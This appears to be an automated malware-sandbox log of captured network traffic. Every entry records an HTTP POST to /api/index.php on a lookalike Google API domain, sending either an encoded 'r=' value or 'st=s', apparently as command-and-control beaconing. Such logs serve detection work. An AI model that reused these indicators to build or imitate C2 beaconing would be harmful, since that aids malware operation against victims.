Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
